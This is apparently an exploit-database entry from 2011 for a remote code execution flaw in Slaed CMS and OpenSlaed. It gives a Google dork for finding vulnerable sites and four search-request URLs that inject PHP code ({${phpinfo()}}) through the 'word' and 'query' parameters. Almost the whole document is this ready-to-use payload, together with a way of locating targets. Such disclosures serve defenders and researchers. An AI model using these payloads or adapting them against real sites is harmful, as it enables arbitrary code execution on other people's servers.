16 lines
No EOL
540 B
Text
16 lines
No EOL
540 B
Text
# Exploit Title: Slaed CMS Code exec
|
|
# Google Dork: "Powered by SLAED CMS"
|
|
# Date: 03.05.2011
|
|
# Author: brain[pillow]
|
|
# Software Link: http://slaed.net/
|
|
# Version: OpenSlaed 1.2 (free), Slaed CMS <= 4.*
|
|
|
|
On different versions of this software next vulnerabilities are availible:
|
|
|
|
/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view
|
|
/index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view
|
|
|
|
OR:
|
|
|
|
/search.html?mod=&word={${phpinfo()}}&query=ok&to=view
|
|
/search.html?mod=&word=ok&query={${phpinfo()}}&to=view |